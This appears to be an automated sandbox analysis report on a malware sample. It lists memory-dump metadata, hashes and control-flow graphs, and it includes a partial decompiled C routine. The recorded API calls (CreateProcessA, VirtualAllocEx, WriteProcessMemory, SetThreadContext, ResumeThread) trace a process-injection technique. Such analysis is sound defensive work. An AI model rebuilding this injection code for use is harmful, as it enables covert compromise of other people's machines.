21627->21605 21685 4cca370 21686 4cca39e 21685->21686 21687 4cca5af 21685->21687 21686->21687 21690 4c614f7 21686->21690 21694 4c614f8 21686->21694 21691 4c61581 CreateProcessA 21690->21691 21693 4c61743 
21691->21693 21693->21693 21695 4c61581 CreateProcessA 21694->21695 21697 4c61743 21695->21697 21697->21697 21628 4c63648 21629 4c637d3 21628->21629 21630 4c6366e 21628->21630 21630->21629 21633 2ba0006 SetWindowLongW 21630->21633 21635 2ba0040 SetWindowLongW 21630->21635 21634 2ba00ac 21633->21634 21634->21630 21636 2ba00ac 21635->21636 21636->21630 21681 4c61068 21682 4c610a8 ResumeThread 21681->21682 21684 4c610d9 21682->21684 21698 4c611b8 21699 4c611fd SetThreadContext 21698->21699 21701 4c61245 21699->21701

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 196 4c614f7-4c6158d 198 4c615c6-4c615e6 196->198 199 4c6158f-4c61599 196->199 206 4c6161f-4c6164e 198->206 207 4c615e8-4c615f2 198->207 199->198 200 4c6159b-4c6159d 199->200 201 4c615c0-4c615c3 200->201 202 4c6159f-4c615a9 200->202 201->198 204 4c615ad-4c615bc 202->204 205 4c615ab 202->205 204->204 209 4c615be 204->209 205->204 215 4c61687-4c61741 CreateProcessA 206->215 216 4c61650-4c6165a 206->216 207->206 208 4c615f4-4c615f6 207->208 210 4c615f8-4c61602 208->210 211 4c61619-4c6161c 208->211 209->201 213 4c61606-4c61615 210->213 214 4c61604 210->214 211->206 213->213 217 4c61617 213->217 214->213 227 4c61743-4c61749 215->227 228 4c6174a-4c617d0 215->228 216->215 218 4c6165c-4c6165e 216->218 217->211 220 4c61660-4c6166a 218->220 221 4c61681-4c61684 218->221 222 4c6166e-4c6167d 220->222 223 4c6166c 220->223 221->215 222->222 225 4c6167f 222->225 223->222 225->221 227->228 238 4c617d2-4c617d6 228->238 239 4c617e0-4c617e4 228->239 238->239 240 4c617d8 238->240 241 4c617e6-4c617ea 239->241 242 4c617f4-4c617f8 239->242 240->239 241->242 245 4c617ec 241->245 243 4c617fa-4c617fe 242->243 244 4c61808-4c6180c 242->244 243->244 246 4c61800 243->246 247 4c6181e-4c61825 244->247 248 4c6180e-4c61814 244->248 245->242 246->244 249 4c61827-4c61836 247->249 250 4c6183c 247->250 248->247 249->250 252 4c6183d 250->252 252->252
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04C6172E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 1c41e7a9ea9f24ba354a08f56d39fd00e1cecd937ad31ef0348a103337bb875c
                                                    • Instruction ID: 91ee5deabbcd642ab9558e2288e811032fc87623f9735b05d716acd0edc0b5cf
                                                    • Opcode Fuzzy Hash: 1c41e7a9ea9f24ba354a08f56d39fd00e1cecd937ad31ef0348a103337bb875c
                                                    • Instruction Fuzzy Hash: A7915C71D002599FDB10CFA8C985BEDBBB2FF48315F098569D80AA7240DB74AA85CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 4c614f8, calls CreateProcessA
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04C6172E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 638c0a3a43d1c7d3daaabca0e7e7f50258dd43b4b2f30a4897e0c99659f811e2
                                                    • Instruction ID: 3be82ef30b08db3da95cdef14c898d9228c5b8c7e6cbc82ae3880b06ae1b285c
                                                    • Opcode Fuzzy Hash: 638c0a3a43d1c7d3daaabca0e7e7f50258dd43b4b2f30a4897e0c99659f811e2
                                                    • Instruction Fuzzy Hash: 5C915C71D00259DFDB10CFA8C985BEDBBB2FF48315F098569D80AA7240DB74AA85CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 2ba23a0, calls CallWindowProcW
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 02BA2461
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.498929829.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2ba0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 736b5ee036414e67ec541321e80cd0b4cf0564c97d09dc1eab8a2a6d9317d7d5
                                                    • Instruction ID: b6e68f8582d31dbcc0abb0fc797e3f0b104beeb91f8b105f135f38e474506d07
                                                    • Opcode Fuzzy Hash: 736b5ee036414e67ec541321e80cd0b4cf0564c97d09dc1eab8a2a6d9317d7d5
                                                    • Instruction Fuzzy Hash: F7412BB9A043058FDB14CF99C448BAABBF5FF88314F29C499D519A7321D735A845CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 4c61350, calls WriteProcessMemory
                                                    APIs
                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04C613E0
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: b9188978854d2d8d04136b6d5f6c4a0f29b2719da217ae2bf4b4a89835fc7b6b
                                                    • Instruction ID: 9e0bf7b495331ff0c2582fd39198fdd6f7d79f640e2bb83bd27be22dbcc7a6dc
                                                    • Opcode Fuzzy Hash: b9188978854d2d8d04136b6d5f6c4a0f29b2719da217ae2bf4b4a89835fc7b6b
                                                    • Instruction Fuzzy Hash: 3B212A719003599FCF10CFA9C884BDEBBF5FF48314F14842AE959A7640C778A945CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 4c61348, calls WriteProcessMemory
                                                    APIs
                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04C613E0
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 80c581498adad972f71936c5230a8521e526e6cad036f7f80844b3e5221a96da
                                                    • Instruction ID: 0ae577e77ce08de6bfdf2e71b08413c5fe87bf0d9ed4ec4adc5abac557200213
                                                    • Opcode Fuzzy Hash: 80c581498adad972f71936c5230a8521e526e6cad036f7f80844b3e5221a96da
                                                    • Instruction Fuzzy Hash: 042133719043498FCB10CFA9C8847DEBBF1FF48314F14842AEA59A7641DB79A945CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 2ba0006, calls SetWindowLongW
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 02BA009D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.498929829.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2ba0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 8c8e3c39dbdf7174f5b4b830597a566b1c87663c80972841a091ac01b561de3b
                                                    • Instruction ID: 1077d35e5ccd299fcbd5a886b0ad49f440f29e0891614ed0f1e910c092c6245d
                                                    • Opcode Fuzzy Hash: 8c8e3c39dbdf7174f5b4b830597a566b1c87663c80972841a091ac01b561de3b
                                                    • Instruction Fuzzy Hash: 412192B58083858FDB11CFA4C859BDABFF4EF5E310F19848AD445A7652C3786844CFA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 4c61d38, calls ReadProcessMemory
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 04C61DB8
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 4217c9c7f304b949c1f2337d16c18f2e939e7e67d693d3a60532ca596736dfc0
                                                    • Instruction ID: 8e3bf69191c93500b633b6af3e94289b11cd6f5d8a2d098cd37f245312f5f70a
                                                    • Opcode Fuzzy Hash: 4217c9c7f304b949c1f2337d16c18f2e939e7e67d693d3a60532ca596736dfc0
                                                    • Instruction Fuzzy Hash: 6F2128B19003599FCF10CFAAC884BEEBBF5FF48314F54842AE519A7240C738A945CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 4c611b8, calls SetThreadContext
                                                    APIs
                                                    • SetThreadContext.KERNEL32(?,00000000), ref: 04C61236
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: 82150b41195736c2a8c1bb658f2b64d0c8ad0929e78e09d526a87835ecd988ad
                                                    • Instruction ID: 8ea9deffb05f6e153926d6aee4e038b21fecc557c993fb8c1d4303dbca5e08df
                                                    • Opcode Fuzzy Hash: 82150b41195736c2a8c1bb658f2b64d0c8ad0929e78e09d526a87835ecd988ad
                                                    • Instruction Fuzzy Hash: E42135B1D003098FDB10DFAAC4847EEBBF5EF88324F54842AD519A7240CB78A945CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 4c61d31, calls ReadProcessMemory
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 04C61DB8
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 81022371b05808838e47fe6ba5ab19dbacfa184be2ca34f59c6d3df630ff0473
                                                    • Instruction ID: e01db6bd953e11533bcbcd4df59f723388f21cdaf75897967f5b1bbf9663baa0
                                                    • Opcode Fuzzy Hash: 81022371b05808838e47fe6ba5ab19dbacfa184be2ca34f59c6d3df630ff0473
                                                    • Instruction Fuzzy Hash: 052125B19003498FCB00CFA9D9807EEBBF1FF48314F15882AE519A7250CB38A945DBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph: function at 4c611b0, calls SetThreadContext
                                                    APIs
                                                    • SetThreadContext.KERNEL32(?,00000000), ref: 04C61236
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: be5536cca776e263ea7e8efbd848cfc80a02b480d0d74828e48c98103276a6b9
                                                    • Instruction ID: 93b3cf65ee81c944c8cdcf6aacbcd99412053c66de16b25a447f585f744d4c0a
                                                    • Opcode Fuzzy Hash: be5536cca776e263ea7e8efbd848cfc80a02b480d0d74828e48c98103276a6b9
                                                    • Instruction Fuzzy Hash: AA2134759002098FDB14CFA9C5847EEBBF1AF48324F14842AD519A7240CB78A945CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 04C612FE
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 727fbe5a1960c5582e2c802b63e72dc37b9e91f647bc14260a60c68a691c18be
                                                    • Instruction ID: 9bfd3db01025620d7e751401056bf635b284f397a14ab6bd8a14adafa936f0cf
                                                    • Opcode Fuzzy Hash: 727fbe5a1960c5582e2c802b63e72dc37b9e91f647bc14260a60c68a691c18be
                                                    • Instruction Fuzzy Hash: 321179719002498FCF10CFAAC844BEFBBF5EF88324F148819E51AA7210C735A944CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 04C612FE
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 36cf799cfd75e47496c1a4c2945980bb77c42cb14a84789beb03504549188564
                                                    • Instruction ID: c462bdb30abcb3920f7b055d48a1df6d7edb58727c3fdaa6ba9db6057905dd2a
                                                    • Opcode Fuzzy Hash: 36cf799cfd75e47496c1a4c2945980bb77c42cb14a84789beb03504549188564
                                                    • Instruction Fuzzy Hash: 45116775900249CFCF10CF99C4447EEBBF2BF88324F14881AD65AA7650CB75A945CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 8ef7cb8b253f960d60f7bc269ad706ade5389acb51cfb5f3757ae860579c82a5
                                                    • Instruction ID: a858654b891182e9b99a07c4e60aeb3a2e1a3c01cc43b6ab6454881326cf14a7
                                                    • Opcode Fuzzy Hash: 8ef7cb8b253f960d60f7bc269ad706ade5389acb51cfb5f3757ae860579c82a5
                                                    • Instruction Fuzzy Hash: 711158B19042498BCB10DFAAC4447EEFBF5AB88224F148819C519A7200CB35A945CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504202752.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4c60000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 0611c2cdb0afea5ade8dee0c7dcf4e10258c1ab6240e4fce197d8e0e6c66074d
                                                    • Instruction ID: 101f1af59c811e1d4a737b605bb4c3725915d5adf441a8e58fb87301e1c08dcb
                                                    • Opcode Fuzzy Hash: 0611c2cdb0afea5ade8dee0c7dcf4e10258c1ab6240e4fce197d8e0e6c66074d
                                                    • Instruction Fuzzy Hash: E41158B5D04359CBCB14DFA9D5843DEFBF1AB88324F14882AC119A7210CB75A945CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 02BA009D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.498929829.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2ba0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 6954ce52cf3e35ecc5bee68926041639ed1ae19fc79e363a71d08d814a3583ef
                                                    • Instruction ID: 6db410179bef07a5df10b3f1dc68a1105efffabb824644adca55599670248c55
                                                    • Opcode Fuzzy Hash: 6954ce52cf3e35ecc5bee68926041639ed1ae19fc79e363a71d08d814a3583ef
                                                    • Instruction Fuzzy Hash: EB1115B59003498FDB20DF99D585BDEFBF8EB88324F10855AD914A3300C374A944CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c2abf3047fee1524abba74ac04250eec7054e17dce9e3bfb2839306e18ddc705
                                                    • Instruction ID: b23f397d745a4821669fc3afa633e2a86e6809650178ad92d2dceee781f6ccdf
                                                    • Opcode Fuzzy Hash: c2abf3047fee1524abba74ac04250eec7054e17dce9e3bfb2839306e18ddc705
                                                    • Instruction Fuzzy Hash: 89A1A139E042089FCB14CF98C585A9EBBF2EF4A710F15846EE955AB751CB32AC42CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d5cabb5c92b213a1f386c1bb481ddce2fba88e7e5591f88d7ba771318a50094b
                                                    • Instruction ID: bea8ea3bf265c4d013e1d26caeedc0ee213a02292381648f9b0634ccf0d38352
                                                    • Opcode Fuzzy Hash: d5cabb5c92b213a1f386c1bb481ddce2fba88e7e5591f88d7ba771318a50094b
                                                    • Instruction Fuzzy Hash: 1591DE31E04219CFCB24CFA8C588A9DB7B3AF89304F25845ED919AB651DB32FD41CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb5ac119c1f1dedd079000f049faf2993f63b524d28789724fcbe2dc18314d13
                                                    • Instruction ID: d7968c7df6bcee26f5b10aca392940d2500e65a8172718c87251ed62c4751bf3
                                                    • Opcode Fuzzy Hash: cb5ac119c1f1dedd079000f049faf2993f63b524d28789724fcbe2dc18314d13
                                                    • Instruction Fuzzy Hash: F5817931E00219CFCB24CFA8C588A9DB7B2FF59304F25845ED959AB651DB32ED81CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6044dcca670da1f88ae5f17b7a6d87053fd145e6df4e52917ca90808d342bd89
                                                    • Instruction ID: 543d1a37eb14c2e30d3cdd7ad195850ff0e3f21cf1a696abdfd1bc64a35c0c69
                                                    • Opcode Fuzzy Hash: 6044dcca670da1f88ae5f17b7a6d87053fd145e6df4e52917ca90808d342bd89
                                                    • Instruction Fuzzy Hash: B551F731B04259DFCB158FA4C518BE9BFF3AF4A300F1980AAD149AB262C7379D44CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b96e7b04ec270ec222070d78d0ed040fec9497261585cc613e252d829ea39e5a
                                                    • Instruction ID: 1336641ccc6988a595916635320b03dd56508ec2deb33ac70188eb93c5e67617
                                                    • Opcode Fuzzy Hash: b96e7b04ec270ec222070d78d0ed040fec9497261585cc613e252d829ea39e5a
                                                    • Instruction Fuzzy Hash: 4A416E39E046099FC714CF98C185AEEBBF2EF4A610F15845EE855BB751C732AC42CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6c5f1eca05c3e3b9f01a955c13f8c90f01a01de0bc787f2abcef6cddfcf84f3
                                                    • Instruction ID: 30d14b74e6f0b5931804f4e08f7bc9317052df293860b9481901cd4a57aa2351
                                                    • Opcode Fuzzy Hash: a6c5f1eca05c3e3b9f01a955c13f8c90f01a01de0bc787f2abcef6cddfcf84f3
                                                    • Instruction Fuzzy Hash: 63418E39E042489FCB14CF98C685A9DBBF3EF49214F25846ED851AB751CB32AD42CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 162c932cb0e50d533037399a024c6036b80dc165b2fe2fc823e0b990dc52506a
                                                    • Instruction ID: 12e4eed29c9d784a774ccd51a756d92921e07ee2444b4a625995ff8059dc62e5
                                                    • Opcode Fuzzy Hash: 162c932cb0e50d533037399a024c6036b80dc165b2fe2fc823e0b990dc52506a
                                                    • Instruction Fuzzy Hash: E0413A39A005089FCB18CF98C685A9EB7F3EB49614F25846EE915AB710CB32AD41CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ff4443ed172c1dc3ff52fc6261f2676ee807a5a2df9ac277d54de4f61504123
                                                    • Instruction ID: bf5d3f4ca5bbdd5509062000a92b0ea3a9c7143b2cff722afe11b2527795b933
                                                    • Opcode Fuzzy Hash: 2ff4443ed172c1dc3ff52fc6261f2676ee807a5a2df9ac277d54de4f61504123
                                                    • Instruction Fuzzy Hash: 2421A131B042699FCB14CF54C1196E9BBF2AF4A304F198499C449AB741C737AD45CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: add70767c30494d0d63eb875d111cdd8c976a987178784b939bcfc040980b816
                                                    • Instruction ID: f7c48fa36f9e2b8ec3a04d4906b24c487e1619bbb46e147cda95f7df665c952f
                                                    • Opcode Fuzzy Hash: add70767c30494d0d63eb875d111cdd8c976a987178784b939bcfc040980b816
                                                    • Instruction Fuzzy Hash: DA11DF34A04249CFEB15CF68D919BA9BBF3AF49704F04406ED105EB691CB366944CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.504430124.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_4cc0000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa049e53ba9c8b61a949d36e630f0e7ad5f6c109232416a32753d1a1e4a13fe5
                                                    • Instruction ID: 94d212c3c7ace8c0e0fbf8c3b35d4a1b140c2601d57deb0d5b03715ef91be84e
                                                    • Opcode Fuzzy Hash: aa049e53ba9c8b61a949d36e630f0e7ad5f6c109232416a32753d1a1e4a13fe5
                                                    • Instruction Fuzzy Hash: 1D113A31B0422D8FCB18CF94C219AEEB7F3AB88714F158469C4097B651CB77AD44CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 85%
                                                     			E00401178() {
                                                     				long _v8;
                                                     				char _v12;
                                                     				char _v16;
                                                     				void* _v40;
                                                     				long _t28;
                                                     				long _t30;
                                                     				long _t31;
                                                     				signed short _t33;
                                                     				void* _t37;
                                                     				long _t40;
                                                     				long _t41;
                                                     				void* _t48;
                                                     				intOrPtr _t50;
                                                     				signed int _t57;
                                                     				signed int _t58;
                                                     				long _t63;
                                                     				long _t65;
                                                     				intOrPtr _t66;
                                                     				void* _t71;
                                                     				void* _t75;
                                                     				signed int _t77;
                                                     				signed int _t78;
                                                     				void* _t82;
                                                     				intOrPtr* _t83;
                                                     
                                                     				_t28 = E00401D96(); // subcall: CreateEventA, GetVersion, OpenProcess on the own PID (see APIs below)
                                                     				_v8 = _t28;
                                                     				if(_t28 != 0) {
                                                     					return _t28;
                                                     				}
                                                     				do {
                                                     					_t77 = 0;
                                                     					_v12 = 0;
                                                     					_t63 = 0x30; // 0x30 = sizeof(SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION), one entry per CPU
                                                     					do {
                                                     						_t71 = E00401F0B(_t63); // heap allocation wrapper (RtlAllocateHeap, see APIs below)
                                                     						if(_t71 == 0) {
                                                     							_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                     						} else {
                                                     							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed; class 8 = SystemProcessorPerformanceInformation
                                                     							_t67 = _t57;
                                                     							_t58 = _t57 & 0x0000ffff;
                                                     							_v8 = _t58;
                                                     							if(_t58 == 4) { // low word of STATUS_INFO_LENGTH_MISMATCH (0xC0000004): grow by one entry and retry
                                                     								_t63 = _t63 + 0x30;
                                                     							}
                                                     							_t78 = 0x13;
                                                     							_t10 = _t67 + 1; // 0x1 (status is 0 on the final pass, so this is the "+ 1")
                                                     							_t77 =  *_t71 % _t78 + _t10; // low DWORD of the first CPU's IdleTime % 19 + 1: a value in 1..19 derived from host activity
                                                     							E004013E6(_t71); // release the buffer (counterpart of the E00401F0B allocation)
                                                     						}
                                                     					} while (_v8 != 0);
                                                     					_t30 = E00401000(_t77); // executed
                                                     					_v8 = _t30;
                                                     					Sleep(_t77 << 4); // executed; 16..304 ms delay, scaled by the value above
                                                     					_t31 = _v8;
                                                     				} while (_t31 == 0x15); // 0x15 = ERROR_NOT_READY: repeat the whole sequence
                                                     				if(_t31 != 0) {
                                                     					L30:
                                                     					return _t31;
                                                     				}
                                                     				_v12 = 0;
